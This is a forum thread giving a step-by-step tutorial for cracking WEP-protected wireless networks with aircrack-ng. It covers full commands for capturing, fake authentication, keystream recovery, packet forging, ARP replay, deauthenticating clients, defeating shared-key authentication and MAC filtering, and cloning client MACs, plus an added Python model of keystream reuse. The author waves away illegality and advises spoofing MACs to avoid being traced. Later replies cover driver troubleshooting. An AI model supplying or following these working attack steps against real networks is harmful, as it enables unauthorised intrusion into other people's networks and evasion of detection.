
How to crack WEP secured wireless networks

Posted: Sun May 17, 2009 10:49 pm
by Sethioz
A Knowledge Database article is available; it is strongly recommended that you read that instead of this.

Video Tutorial
How to patch zydas 1211 / zd1211 chipset in order to get injection working

It took me freaking ages to get my stuff working, but finally I did.
The struggle is with the hardware. I have an RTL8185, which is supported by BackTrack 4 now!
So all you need is a copy of BackTrack 4 beta and you are good to go.

Toolz (OS) needed:
BackTrack 5 (or any other Linux; BT4 is suggested because it has all the tools in it) - has to be BT5 (either beta or full), anything under 4 will not have the drivers.
aircrack-ng suite - you do not need this if you are using BackTrack 4 (it's already built in); you only need it if you are using another Linux.

Let's get down to the cracking part then.

NOTE: everything is done in the terminal, so if I say type, then it means into the terminal!
NOTE2: if your interface is different, then fix it first! My main wireless adapter interface is "wlan0" and the activated rfmon mode (monitor mode) interface is "mon0", so my examples use those!

1. open a terminal and type

Code: Select all

airmon-ng start wlan0
where wlan0 is the interface of your card; type just airmon-ng without arguments to see the interface! If it is not wlan0, then replace it with the one you have.
Now it says that monitor mode is enabled on mon0 (we use this from now on to capture).

2. now let's capture some packets by typing

Code: Select all

airodump-ng mon0
This will show you the available networks.
Press Ctrl+C to stop it.
Now pick your 'victim' and copy its BSSID (MAC).

3. type

Code: Select all

airodump-ng --bssid 00:00:00:00:00:00 --channel 1 --ivs -w yourfile mon0
--bssid is the MAC of the victim you picked! Paste it there.
--channel < look at what channel your 'victim' is/was on
--ivs captures the IVs
-w output file where it saves packets (you do not need to put .ivs at the end!)
mon0 < the monitoring interface you activated
Now leave it as it is and do not touch it.
NOTE - you need at least 1 data packet to get it going; if there is no data transferred in 10 mins or so, then you can pick a new 'victim' or wait until somebody connects.

4. you need to authenticate your MAC address with the AP first! Or injection will fail.

Code: Select all

aireplay-ng -1 1 -a 00:00:00:00:00:00 mon0

-1 < delay (if you are CLOSE to the WAP then use 1; it's a delay and needs to be bigger if you are further away and the signal is weak)
-a BSSID (MAC) of your victim

5. type

Code: Select all

aireplay-ng -5 -b 00:00:00:00:00:00 mon0
-b < this is your victim's MAC as before
mon0 < this is the interface you use to send packets
You need to wait until you get the keystream! It will stop and tell you when it's found.


5b. type

Code: Select all

aireplay-ng -4 -b 00:00:00:00:00:00 mon0
-4 < decrypts a WEP packet (chopchop method)
-b < BSSID (MAC) of your victim AP
mon0 < your monitoring interface

Now wait until you get the keystream!
Once it's found, you can move to step 6 and close 4 and 5 (of course do not forget to COPY the keystream file name!!! It looks like keystream3232.xor).

NOTE - it seems that method 5b works better, because it seems to need only one packet to chopchop and generate a keystream. Extremely useful if the access point does not send many data packets. About 10 mins ago I ran into one that sent data packets very rarely.

6. let's build a packet using the keystream file

Code: Select all

packetforge-ng -0 -a 00:00:00:00:00:00 -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y keystream.xor -w packet1
-y < this is the .xor file that you found already
-w < this is the output file where you will save it
-h < this is your (fake) MAC address; you can probably leave this out altogether
-a < MAC of your victim
-0 < build an ARP request; -k and -l are the destination and source IP it carries (255.255.255.255 works for both)

7. now let's send some fake packets to boost the traffic

Code: Select all

aireplay-ng -3 -r packet1 -b 00:00:00:00:00:00 mon0
-r < this is the file which you just made in step 6
-b < BSSID of your victim again
mon0 < the interface you use to send fake traffic

- How to crack when the router has flood protection
- simply add

Code: Select all

-x [number of packets per second]
- where [number of packets per second] is the desired delay. 10 packets per second should not cause a MAC ban; however if it does, then simply use the -h option to change your MAC, but remember to add the same MAC to both the fake authentication and step 7.

8. now check your first window (airodump-ng) and wait until you have about 75000-100000 packets (works FINE on WEP)

9. now we can try to crack that key. DO NOT close airodump-ng, let it capture

Code: Select all

aircrack-ng yourfile-01.ivs
yourfile-01.ivs < this is the file airodump-ng wrote with the name you specified in step 3
It should give you the key in less than 5 seconds!
If you didn't get it, then post your error here, because I was always successful at this point. If it says not found or something, then maybe you didn't have enough packets; wait until you have 200000 packets and try again. I will include some screens here too (look below).

WARNING! I should warn you that it is illegal to crack somebody else's network, but who gives a shit these days?! Just spoof your MAC and make sure there are no FBI vans outside who may use GPS to track the source (you).

Recently I discovered that I do not need to use airmon-ng at all. I can simply do "airodump-ng wlan0" and it puts my card into monitor mode too.

Scratch that last update; dunno why it worked before, but now I do need to use airmon-ng, maybe some fuck-up.
Anyway, I found out that the "delay" mentioned in "step 5" is always good to put on 1.

First I thought that you need over 50000 packets to successfully crack WEP (based on what I have read about WEP cracking), but from my own experience 20000-30000 is more than enough, of course depending on the strength of the key. I managed to crack one network with 10000 IVs! I included the screenshot of it (last screen).

I recently cracked 2 more WEPs; I was able to crack both with about 10000 IVs only. One had 12000 and the other had 10000 or so.

I have played around with WEP networks in the past 3 days. It is kind of obvious, but still worth mentioning: it is not just the antenna that matters, it is very important to have a proper card too.
For example I have tested with a USB adapter and a PCI adapter (TP-Link with Atheros chipset and some PCI card with RTL8185 chipset).
I left the antenna in the same place; using Windows XP and the PCI card, signals were quite OK. I was able to connect to the station. Speedtest ping was 60ms, which is quite good, while using the USB adapter and BackTrack 5 I barely saw the station.
I have no idea how powerful these cards are, but my guess is 500-1000mW. I'm getting a 2000mW card now, hoping it will give an even better signal.

Screenshot: successful cracking of WEP in less than 10 mins
Screenshot: sending and capturing of the fake packets
Screenshot: using Kismet to get info from the WAPs
Screenshot (10kcrack.png): WEP cracked with only 10000 IVs

Re: How to crack WEP secured wireless networks

Posted: Wed Sep 30, 2009 6:49 pm
by Sethioz
Thanks to V, I now write the tutorial on how to crack WEP when it uses shared key authentication. V had that problem and was unable to crack the WEP network because it was using WEP shared key.

So what is shared key authentication?
Here's a chunk from Wikipedia to make it clear in a few words:
1. The client station sends an authentication request to the Access Point.
2. The Access Point sends back a clear-text challenge.
3. The client has to encrypt the challenge text using the configured WEP key, and send it back in another authentication request.
4. The Access Point decrypts the material, and compares it with the clear-text it had sent. Depending on the success of this comparison, the Access Point sends back a positive or negative response.

So to be able to crack WEP that uses shared key, you need that 4-way handshake authentication packet. It means you can't crack it if there are no connected clients.
Right, let's start with it.

NOTE: this tutorial is written assuming that you have read the tutorial above!

1. set your card to monitor mode.

2. Let's capture the handshake. Instead of capturing IVs only, you need to capture full packets.

Code: Select all

airodump-ng -c 11 --bssid 00:11:22:33:44:55 -w blahpacket mon0
-c or --channel > channel
--bssid > mac of the victim AP
-w > file where you want to save packets
mon0 > your monitor device

Basically you need to either wait until somebody logs into the AP or deauthenticate the connected client to get the handshake. How do you know when you've got it?!
Look in airodump's window; there is a column saying "AUTH". Once "SKA" appears under it, then you have successfully got it. Check the directory where it saves the packets (usually your home directory) and you should see files like this:
blahpacket-01-01-14-22--33-84.xor blahpacket-01.cap blahpacket-01.txt
"blahpacket-01-01-14-22--33-84.xor" contains the data needed for fake authentication.

3. How to get the .xor file if there is a client connected already. Simple: we deauthenticate that client, forcing him/her to authenticate again.

Code: Select all

aireplay-ng -0 1 -a 00:11:22:33:44:55 -c 00:06:66:77:88:99 mon0
-0 > deauthentication feature, where 1 is number of times to send
-a > mac address of your victim (access point)
-c > mac address of connected client
mon0 > monitoring interface

4. making the fake deauthentication to get more packets for cracking.

Code: Select all

aireplay-ng -1 0  -e nameofAP -y blahpacket-01-01-14-22--33-84.xor -a 00:11:22:33:44:55 -h 00:06:66:77:88:99 mon0
-1 > fake authentication feature
0 > authenticate only once
-e > name of the access point
-y > selects the .xor file containing the PRGA xor bits to make a successful authentication with shared key.
-a > mac address of access point (victim)
-h > fake mac address for yourself (optional, but better safe than sorry)
mon0 > your monitoring interface

Now you can get the other steps from above. This only explained how to do fake authentication when the AP uses shared key; the other steps are the same. You simply send fake authentications to get the data flowing.

NOTE: even I didn't know about shared key before, so it must be very rare. Also, before writing this I wanted to make a video tutorial on it, but I discovered that my Speedtouch 780WL router does not even support WEP shared key, and the ST780WL is quite a good router.
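Added example, not code from either of the posts above: a small Python model of why both tutorials work. It uses the real WEP primitives (RC4 keyed with IV||key, a keyless CRC-32 ICV) and shows two things with the same helpers: recovering a keystream from a packet with known plaintext and reusing it to forge a fresh ARP request (the aireplay-ng -4/-5 and packetforge-ng -y steps of the first post), and answering a new shared-key challenge with the keystream pulled from a captured SKA handshake (the aireplay-ng -1 -y step of the second post). The WEP key, IVs, MAC addresses, IPs and challenge bytes are constructed for the demo; the attacker-side functions never touch the key. It also assumes the whole ARP plaintext is known, which is what the fragmentation/chopchop steps deliver.

```python
"""Added example, not part of the forum posts: why keystream reuse breaks WEP."""
import struct
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """RC4 key scheduling plus keystream generation, exactly as WEP uses it."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian, no key involved."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV (3 bytes, sent in clear) || RC4(IV||key) XOR (data||ICV)."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4(iv + wep_key, len(body)))


def wep_decrypt(wep_key: bytes, frame: bytes):
    """What the AP does: decrypt and accept only if the ICV matches (else None)."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4(iv + wep_key, len(body)))
    data, tag = plain[:-4], plain[-4:]
    return data if icv(data) == tag else None


# Constructed scenario. WEP_KEY is only used to simulate the AP and the real
# client; the attacker-side functions below never see it.
WEP_KEY = bytes.fromhex("0123456789abcdef0123456789")   # constructed 104-bit key
CLIENT_MAC = bytes.fromhex("000666778899")              # constructed
ATTACKER_MAC = bytes.fromhex("00c0ffee0001")            # constructed
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")        # fixed ARP header prefix


def arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    """LLC/SNAP header + ARP request, the packet packetforge-ng -0 builds."""
    return (LLC_SNAP_ARP + struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1)
            + sender_mac + sender_ip + b"\x00" * 6 + target_ip)


def keystream_from_known_plaintext(frame: bytes, known_plain: bytes):
    """Ciphertext XOR (known plaintext || its ICV) = RC4 keystream for that IV.
    This is what the page's .xor files hold; no key is needed to get it."""
    iv, body = frame[:3], frame[3:]
    return iv, xor(body, known_plain + icv(known_plain))


def forge(iv: bytes, keystream: bytes, new_plain: bytes) -> bytes:
    """Encrypt new data under a recovered keystream (packetforge-ng -y, aireplay -y).
    Works because WEP lets an IV be reused and the ICV needs no key."""
    body = new_plain + icv(new_plain)
    if len(body) > len(keystream):
        raise ValueError("recovered keystream too short for this packet")
    return iv + xor(body, keystream[:len(body)])


def demo_forge_arp() -> bytes:
    """Steps 5/6/7: capture one ARP request, recover its keystream, inject a new one."""
    real = arp_request(CLIENT_MAC, bytes([10, 0, 0, 5]), bytes([10, 0, 0, 1]))
    captured = wep_encrypt(WEP_KEY, b"\x01\x02\x03", real)      # seen over the air
    iv, ks = keystream_from_known_plaintext(captured, real)     # the keystream*.xor
    mine = arp_request(ATTACKER_MAC, bytes([10, 0, 0, 99]), bytes([10, 0, 0, 1]))
    forged = forge(iv, ks, mine)                                # packet1
    return wep_decrypt(WEP_KEY, forged)    # AP accepts it and answers with fresh IVs


def demo_shared_key_auth() -> bool:
    """SKA handshake: challenge (clear) + encrypted reply give 128+4 keystream bytes."""
    challenge = bytes(range(128))                               # frame 2, constructed
    reply = wep_encrypt(WEP_KEY, b"\x0a\x0b\x0c", challenge)    # frame 3 from client
    iv, ks = keystream_from_known_plaintext(reply, challenge)   # the SKA .xor file
    fresh_challenge = bytes(reversed(range(128)))               # AP now challenges us
    answer = forge(iv, ks, fresh_challenge)                     # aireplay-ng -1 -y
    return wep_decrypt(WEP_KEY, answer) == fresh_challenge      # AP: authenticated


if __name__ == "__main__":
    print(demo_forge_arp().hex())
    print(demo_shared_key_auth())
```

The same property explains the MAC-ban dance in the flood-protection note: the AP can throttle a source address, but it cannot tell a forged frame from a real one, because nothing in the frame depends on anything the attacker lacks.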

Re: How to crack WEP secured wireless networks

Posted: Sat Feb 13, 2010 7:01 pm
by Ileostomy
Well, I bought a W-LAN stick now,
and now the problem is that BackTrack 4 does not detect any USB device.
No USB stick and no W-LAN stick. Is there a command or something to activate USB?

Re: How to crack WEP secured wireless networks

Posted: Sat Feb 13, 2010 11:26 pm
by Sethioz
No, there is no command, but there are drivers. I suggest installing Ubuntu instead. Your laptop was a big mess; I suggest you format it and put XP + Ubuntu on it as dual boot, if you want to make it a powerful cracking and hacking tool.
I assume you are testing it on a laptop; I remember that BackTrack 4 didn't even detect your internal adapter for some reason.
Anyway, try whether the USB stick works fine in Windows (any Windows). If so, then you need drivers.
Ubuntu should install them manually.

Also give more info: what USB is it? It might be some compatibility problem; check and search for the list.
Registering and asking a question on their forum is quite pointless; they are full of themselves and won't really help, they just say "google" or "read the wiki"... that's dumb.
However it's not so hard to find the compatibility list on their site. It's a hassle, I know, but this is how cracking and hacking is.

1. find out what chipset your USB card has (manufacturer doesn't matter, just the chipset)
2. go to and find out if your chipset is supported (it might be supported on Windows, but I doubt it).
3. either get the right drivers from or install Ubuntu and see if it installs them.
4. in Ubuntu get the "aircrack-ng" suite using the Synaptic package manager.

Re: How to crack WEP secured wireless networks

Posted: Tue Feb 16, 2010 7:19 am
by Ileostomy
Yeah, my USB stick works fine in any Windows and my W-LAN stick too.
So the problem is in BT4, so I'll get Ubuntu now and follow your suggestions :)

Re: How to crack WEP secured wireless networks

Posted: Wed Feb 17, 2010 12:47 pm
by Ileostomy
OK, I've got Ubuntu now, and installed it nicely.
Now I need to get my W-LAN stick running there. What I need to do for that is first download all the Ubuntu updates,
which I CAN'T do because the partition which Ubuntu created for itself is too small, so I downloaded the GParted partition manager and am trying to resize the partition...
I also figured out the chipset of my W-LAN stick: it's "Atheros".

Re: How to crack WEP secured wireless networks

Posted: Wed Feb 17, 2010 9:11 pm
by Sethioz
Atheros is most common, so it should work fine, but this isn't a Linux discussion; next time use manual setup or the "side by side" option.

You do not need Ubuntu updates (unless it's some old shit, but I'm sure you downloaded a new one; 9.10 is the newest atm).
I'm not sure about below 9.04, but my first Ubuntu was 9.04 and it worked just fine without any additional drivers.
All you need to do is just download "aircrack-ng". You can do that via the Synaptic update manager or the console ("apt-get install aircrack-ng" should work).

Re: How to crack WEP secured wireless networks

Posted: Thu Feb 18, 2010 12:26 pm
by Ileostomy
I did that but it still does not detect my W-LAN stick.
There's a little light on my W-LAN stick which is not glowing either.

So what did I do wrong?

NOTE: it's not the USB device, it detects my USB stick fine now!

Re: How to crack WEP secured wireless networks

Posted: Thu Feb 18, 2010 7:29 pm
by Ileostomy
I was looking for a tutorial on how to get my fucking W-LAN stick working, but still no success :@

I found this:
And followed this tutorial like the other guy did:

And everything worked like the tutorial explained, but without any result!!
It still does not detect my friggin TL-WN620G W-LAN stick...
BTW I've got Ubuntu 9.04 Jaunty Jackalope.

Re: How to crack WEP secured wireless networks

Posted: Thu Feb 18, 2010 10:14 pm
by Sethioz
It is totally off-topic; there's a Linux topic somewhere. If you can't find it, make a new one with as detailed a title as possible.

Re: How to crack WEP secured wireless networks

Posted: Thu Mar 24, 2011 4:29 pm
by Sethioz
I decided to go wireless fishing and I tripped over a tough one. It uses SKA (shared key authentication), but it should matter.
It's WEP ofc; the problem is that nothing seems to be working properly. I keep getting errors using the -4 and -5 options in aireplay.
I tried different MAC addresses and still nothing. Some stations temporarily ban your MAC if you keep flooding them, so you must run a new fake auth using a new faked MAC and then change the MAC for the other commands too, but this one is even tougher than that.

What seems to be working best is that there is one connected client and I stole its MAC and am using that, so no authentication is needed at all. This reduces traffic between me and the AP. It might be bad signal and it might be a bad router.
Anyway, if you have this issue, try stealing the MAC from connected clients; it might work better than fake auth.

However, if the connected client sends enough data, then there is no need to do anything else but just wait, get enough data packets and crack it. In my case the connected client is not sending enough data, like 5000 packets an hour, so I have to wait 5 hours to get it cracked without any interaction from my side.

Re: How to crack WEP secured wireless networks

Posted: Sat May 05, 2012 1:15 am
by Sethioz
I've done it so many times, yet I find new tricks and tools.
For example I have one tough station that doesn't even accept fake authentications. Seems like it has MAC filtering on; however what I did is I changed my MAC to the same as the AP itself and then it accepted the fake authentications.
Just a note on what to do if it won't accept fake auths.
However the other problem is that it won't send any data packets at all. It's odd though. Authentication is OPEN, it should accept all; must be MAC filtering only. Anyway it works if you use the AP's own MAC.